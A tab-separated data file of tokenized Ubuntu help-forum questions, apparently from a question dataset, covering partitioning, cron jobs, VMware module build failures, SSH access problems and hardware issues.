118509	how do i enable 132x50 text mode for console instead of 80x25 ?	what parameters do i have to set in /etc/default/grub in order to boot by default in 132x50 and verbose .
118511	need help with partitioning	i bought a new laptop with no os and decided to try to linux ( ubuntu ) for the first time in my life . it was a clean install , my laptop had no other os present in it , not even dos . while installing , it asked for partitioning . out of the 320gb of free space i created a new partition of 20 gb and installed ubuntu in it . the rest of the 300gb is still available as free space . soon i realized that i ca n't use the 300gb of space and that only 20gb is available to me for use . can anyone tell me how i can take away some free space away from the 300gb and add that to my 20gb partition ? i have installed the gparted partition editor from the ubuntu software center but have no idea how to go ahead with it . thanks : )
118516	run .profile function as cron job	in the .profile file of the root user i have defined a function , e.g . function printdate ( ) { date } i want to run this function every minute and append the output to cron.log . i tried adding the following crontab entry : * * * * * printdate > $ home/cron.log 2 > & 1 but it does n't work . the cron.log file gets created , but it 's empty . i guess this is because the .profile is n't read by cron , so any functions/aliases defined therein are unavailable to it . so i tried changing the crontab entry to : * * * * * source $ home/.profile ; printdate > > $ home/cron.log 2 > & 1 but this does n't work either . it seems cron still does n't have access to the printdate function because i see the following in cron.log /bin/sh : printdate : not found
118519	installing onto a laptop after uninstalled with easybcd	i had ubuntu on my laptop a few days ago but a professional installed it for me . soon after i got it from the guy i messed it up . i uninstalled ubuntu with easybcd and now i 'm scared it will complicate things . does it ? i 'm sure i downloaded ubuntu to disk on this site : http : //www.ubuntu.com/download/ubuntu/download and got this file : ubuntu-11.10-server-amd64 which i burned to disk . when i put the cd in my laptop it shows me a wubi.exe file . when i reboot with the cd it boots straight to windows 7 . what 's wrong ? teach me
118520	web design software	what software do you use , or you recommend me using for designing web pages ? i do n't mean wysiwyg software , but more like adobe photoshop . i 'm aware of gimp , but i do n't like the separate windows thingie ... i looked into inkscape and it seems promising but cant find any good tutorials ( for webdesign ) . so what 's your opinion on this topic ?
118522	touchpad & trackpoint ( thinkpad l520 ) suddenly unresponsive	my mother has a problem with her thinkpad l520 notebook ( ubuntu 11.10 , unity ) . she boots the device , everything works fine at first . but then , out of nowhere , her touchpad + trackpoint stop working . she ca n't click or drag the mouse . if she connects an external mouse , she can move the pointer and click ( but the internal touchpad or trackpoint still do n't work ) . she already updated everything through the update manager , but still no success ... like i said , sometimes it works , sometimes it does n't . there are no 'special ' mouse drivers installed . what can i do to fix this ? thank you for your help ! : )
118523	what 's the equivalent of the `` cls '' command from windows/dos ?	i used to use cmd back in windows , and the command line i used a lot , was cls . it 's kind of like the clear command used in linux , but it cleans the screen permanently . if you use the clear command , it just scroll down , so that you do n't see the command you where working on . i like both a lot , but my question is , how do i get a cls like command , that clears the screen , and ca n't browse up , to see the command you where working on ?
118525	changing permissions of `nyccrash.txt ' : operation not permitted	i have an assignment to write php code , and upload the data to our school student 's account . to make sure my script is working , i need to change the permissions on the files . i am not a root because i am a student . how can i fix that problem ? chown : changing permissions of `nyccrash.txt ' : operation not permitted those files has permission labeled as apache the owner and user are apache , according to ls -ls thanks .
118527	is there an open source alternative to `` adobe digital editions '' ?	for the moment i run adobe digital editions under wine to download ebooks burdened with ditigal restriction management . i only use it to open .acsm files supplied by ebook-shops , which contain authentication information required to download the actual drm'ed ebook files , which i then transfer to my reader-device with calibre . my question is , if there exist open source alternatives to adobe digital editions . they do n't need much functionality . i just want to put the .acsm-file in and get the .epub out ( no , i do n't want to remove the drm , that 'd be illegal afaik ) .
118528	how to remove the title bar of a window in js/lg/extension under gnome-shell ?	i know that title bar of windows can be removed in { g , d } conf-editor or by modifying the metacity theme . however , i want to have some rather complex rules for showing title bars or not ( like hide the title bar if the window is tiled ) and an extension is the only way i can think of to do this . metawindow.get_frame does n't seem to be accessible in js , is there a way to control the decoration of windows in a gnome-shell extension ? thx .
118529	intel 865g chipset drivers	is it important to install chipset drivers on ubuntu ? i 'm not using onboard graphics but in windows it is important i think , i got linux drivers for my chipset and never tried to install them ( hard way no .deb files , only manual installation ) i 'm not talking about installing vga drivers but lan and other motherboard drivers , except audio
118533	how to install lexmark s308 printer ?	i have a multi function lexmark printer with a instalation cd but can get the .exe to run , im new to the ubuntu world so i dont know how to install third party software yet . thank for your help .
118542	vmware network installation problem	after installation from vmware_bunddle it shows network device error during configuration ( first run ) . log file : 2012-04-03t20:01:24.881+06:00| vthread-3| i120 : log for vmware workstation pid=5766 version=8.0.2 build=build-591240 option=release 2012-04-03t20:01:24.881+06:00| vthread-3| i120 : the process is 64-bit . 2012-04-03t20:01:24.881+06:00| vthread-3| i120 : host codepage=utf-8 encoding=utf-8 2012-04-03t20:01:24.881+06:00| vthread-3| i120 : host is linux 3.2.0-19-generic ubuntu precise ( development branch ) 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : msg_reset : 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /usr/lib/vmware/settings '' : no such file or directory . 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : pref optional preferences file not found at /usr/lib/vmware/settings . using default values . 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : msg_reset : 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/config '' : no such file or directory . 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : pref optional preferences file not found at /root/.vmware/config . using default values . 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : msg_reset : 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/preferences '' : no such file or directory . 2012-04-03t20:01:24.880+06:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-04-03t20:01:24.881+06:00| vthread-3| i120 : pref failed to load user preferences . 2012-04-03t20:01:24.881+06:00| vthread-3| w110 : logging to /tmp/vmware-root/modconfig-5766.log 2012-04-03t20:01:25.200+06:00| vthread-3| i120 : modconf query interface initialized 2012-04-03t20:01:25.201+06:00| vthread-3| i120 : modconf library initialized 2012-04-03t20:01:25.269+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.278+06:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.278+06:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-04-03t20:01:25.278+06:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-04-03t20:01:25.278+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.284+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.306+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.355+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:25.355+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.362+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.383+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.434+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:25.502+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.507+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.511+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.516+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.521+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.561+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.566+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.571+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.576+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.581+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.586+06:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.586+06:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-04-03t20:01:25.586+06:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-04-03t20:01:25.586+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.593+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.614+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.663+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:25.740+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.747+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.752+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.757+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.762+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:25.767+06:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.767+06:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-04-03t20:01:25.767+06:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-04-03t20:01:25.767+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:25.772+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.792+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:25.843+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:26.838+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:26.848+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:26.853+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:26.858+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:26.863+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:28.460+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:28.460+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:28.466+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:28.488+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:28.542+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:28.542+06:00| vthread-3| i120 : building module vmmon . 2012-04-03t20:01:28.553+06:00| vthread-3| i120 : extracting the sources of the vmmon module . 2012-04-03t20:01:28.615+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:01:36.499+06:00| vthread-3| i120 : installing module vmmon from /tmp/vmware-root/modules/vmmon.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:01:36.507+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmmon.ko 2012-04-03t20:01:58.314+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:01:58.315+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:01:58.336+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:58.379+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:01:58.431+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:01:58.431+06:00| vthread-3| i120 : building module vmnet . 2012-04-03t20:01:58.431+06:00| vthread-3| i120 : extracting the sources of the vmnet module . 2012-04-03t20:01:58.541+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmnet-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:02:05.973+06:00| vthread-3| i120 : failed to compile module vmnet ! 2012-04-03t20:02:05.984+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:02:05.984+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:02:05.990+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:06.015+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:06.067+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:02:06.067+06:00| vthread-3| i120 : building module vmblock . 2012-04-03t20:02:06.067+06:00| vthread-3| i120 : extracting the sources of the vmblock module . 2012-04-03t20:02:06.141+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmblock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:02:13.531+06:00| vthread-3| i120 : installing module vmblock from /tmp/vmware-root/modules/vmblock.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:02:13.532+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmblock.ko 2012-04-03t20:02:19.090+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:02:19.090+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:02:19.097+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:19.117+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:19.173+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:02:19.173+06:00| vthread-3| i120 : building module vmci . 2012-04-03t20:02:19.174+06:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-04-03t20:02:19.284+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:02:28.525+06:00| vthread-3| i120 : installing module vmci from /tmp/vmware-root/modules/vmci.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:02:28.526+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmci.ko 2012-04-03t20:02:31.760+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:02:31.760+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:02:31.766+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:31.786+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:02:31.838+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:02:31.838+06:00| vthread-3| i120 : building module vmci . 2012-04-03t20:02:31.839+06:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-04-03t20:02:31.864+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:02:33.684+06:00| vthread-3| i120 : building module vsock . 2012-04-03t20:02:33.685+06:00| vthread-3| i120 : extracting the sources of the vsock module . 2012-04-03t20:02:33.809+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vsock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:02:41.050+06:00| vthread-3| i120 : installing module vsock from /tmp/vmware-root/modules/vsock.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:02:41.051+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vsock.ko 2012-04-03t20:03:02.757+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.762+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.767+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.771+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.776+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.782+06:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:02.782+06:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-04-03t20:03:02.782+06:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-04-03t20:03:02.782+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:02.790+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:02.814+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:02.865+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:02.958+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.968+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.973+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.978+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:02.983+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:04.372+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:04.372+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:04.378+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:04.399+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:04.452+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:04.452+06:00| vthread-3| i120 : building module vmmon . 2012-04-03t20:03:04.452+06:00| vthread-3| i120 : extracting the sources of the vmmon module . 2012-04-03t20:03:04.486+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:05.976+06:00| vthread-3| i120 : installing module vmmon from /tmp/vmware-root/modules/vmmon.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:03:05.977+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmmon.ko 2012-04-03t20:03:09.056+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:09.057+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:09.065+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:09.090+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:09.142+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:09.142+06:00| vthread-3| i120 : building module vmnet . 2012-04-03t20:03:09.142+06:00| vthread-3| i120 : extracting the sources of the vmnet module . 2012-04-03t20:03:09.169+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmnet-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:12.072+06:00| vthread-3| i120 : failed to compile module vmnet ! 2012-04-03t20:03:12.090+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:12.090+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:12.098+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:12.121+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:12.179+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:12.179+06:00| vthread-3| i120 : building module vmblock . 2012-04-03t20:03:12.179+06:00| vthread-3| i120 : extracting the sources of the vmblock module . 2012-04-03t20:03:12.205+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmblock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:15.340+06:00| vthread-3| i120 : installing module vmblock from /tmp/vmware-root/modules/vmblock.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:03:15.341+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmblock.ko 2012-04-03t20:03:18.451+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:18.451+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:18.457+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:18.480+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:18.531+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:18.531+06:00| vthread-3| i120 : building module vmci . 2012-04-03t20:03:18.531+06:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-04-03t20:03:18.569+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:19.787+06:00| vthread-3| i120 : installing module vmci from /tmp/vmware-root/modules/vmci.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:03:19.789+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vmci.ko 2012-04-03t20:03:22.933+06:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-19-generic . 2012-04-03t20:03:22.933+06:00| vthread-3| i120 : validating path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic 2012-04-03t20:03:22.939+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:22.959+06:00| vthread-3| i120 : your gcc version : 4.6 2012-04-03t20:03:23.009+06:00| vthread-3| i120 : header path /lib/modules/3.2.0-19-generic/build/include for kernel release 3.2.0-19-generic is valid . 2012-04-03t20:03:23.009+06:00| vthread-3| i120 : building module vmci . 2012-04-03t20:03:23.009+06:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-04-03t20:03:23.034+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:24.227+06:00| vthread-3| i120 : building module vsock . 2012-04-03t20:03:24.227+06:00| vthread-3| i120 : extracting the sources of the vsock module . 2012-04-03t20:03:24.254+06:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vsock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-19-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-04-03t20:03:26.125+06:00| vthread-3| i120 : installing module vsock from /tmp/vmware-root/modules/vsock.o to /lib/modules/3.2.0-19-generic/misc . 2012-04-03t20:03:26.126+06:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-19-generic/misc/vsock.ko my system details : cpu : amd apu dual core e450 ram : 2gb ubuntu : 12.04 ( 64 bit ) i have downloaded latest vmware version . thanks in advance
118544	how to hide the unable to mount iphone message : unhandled lockdown error ( -15 ) ?	i just want not to see any message like the above , as i connect the iphone to my workstation only to charge it . i know that there are similar questions but none of them is trying to solve the problem by stopping hiding the message . also , the solution has to work on multiple account , i do n't want to get the message when i login as another user .
118546	gtk theme became ugly	i just run unity-greeter from terminal it worked without any problems but my theme changed to ugly default theme of gnome , i tried to change it using ubuntu-tweak and gnome-tweak , but it didnt work thanks in advance
118548	how do i end standard input without a newline character ?	i press ctrl+d to end standard input , but it only works if i 'm on a fresh line . and that requires me to push enter first , which puts an unwanted new line character in there . is there any way around that ?
118553	ubuntu shutdown command does n't shutdown properly	i think i have problem with shutdown command . using ubuntu 11.10 . the shutdown command works and computer shuts down , but when i boot i get the following warning : * * * * * warning : system boot fail * * * * * your system last boot fail or post interrupted . please enter setup to load default and reboot again . this warning appears only when i shutdown computer . if i reboot , there is no warning . i do n't know what to do and it 's really annoying pressing f1 so that computer boot will continue . this problem first appeared on ubuntu 11.04 or possibly even further back . i should mention , that i have dual boot system , and the other operating systems is win7 and it does n't trigger this warning . i reseted bios and problem is still there . your help will be warmly received . thanks domen
118554	gma 6300 in asus eeepc x101ch stuck at 800x600	i 've read that this card is unsupported at the moment and i can wait with ubuntu 2d . what i ca n't stand is working in 800x600 resolution . any ideas ? i 'm running precise beta 2 on a asus eeepc x101ch thank u ! ! !
118556	unable to access the server via ssh ?	when i am trying to access the server through ssh it says : ssh : connect to host xx.yyy.zzz.x port 22 : connection refused and on the server in auth.log it shows following log entry : address xx.yyy.zzz.x maps to xx.yyy.zzz.x.static-pune-vsnl.net.in , but this does not map back to the address - possible break-in attempt ! i have created a user account for that user and it is also in enabled status . requested info it is ubuntu 11.10 it is configured as ssh server using openssh-server i am trying to connect to this server using putty from windows 7 i.e . my desktop i have also asked this in superuser as per the request of @ zpletan and link to that question is given below . http : //superuser.com/questions/408080/unable-to-access-the-server-via-ssh thanks in advance .
118559	network problem while reinstalling grub	i 'm trying to reinstall grub on a second disk , following the instructions at purge & reinstall grub . after doing sudo chroot /mnt , when i attempt apt-get update , i get lot of failed to fetch messages . apparently dns is not working , since running the host command on any hostname times out : no servers could be reached . if i exit the chroot , host and apt-get update work just fine .
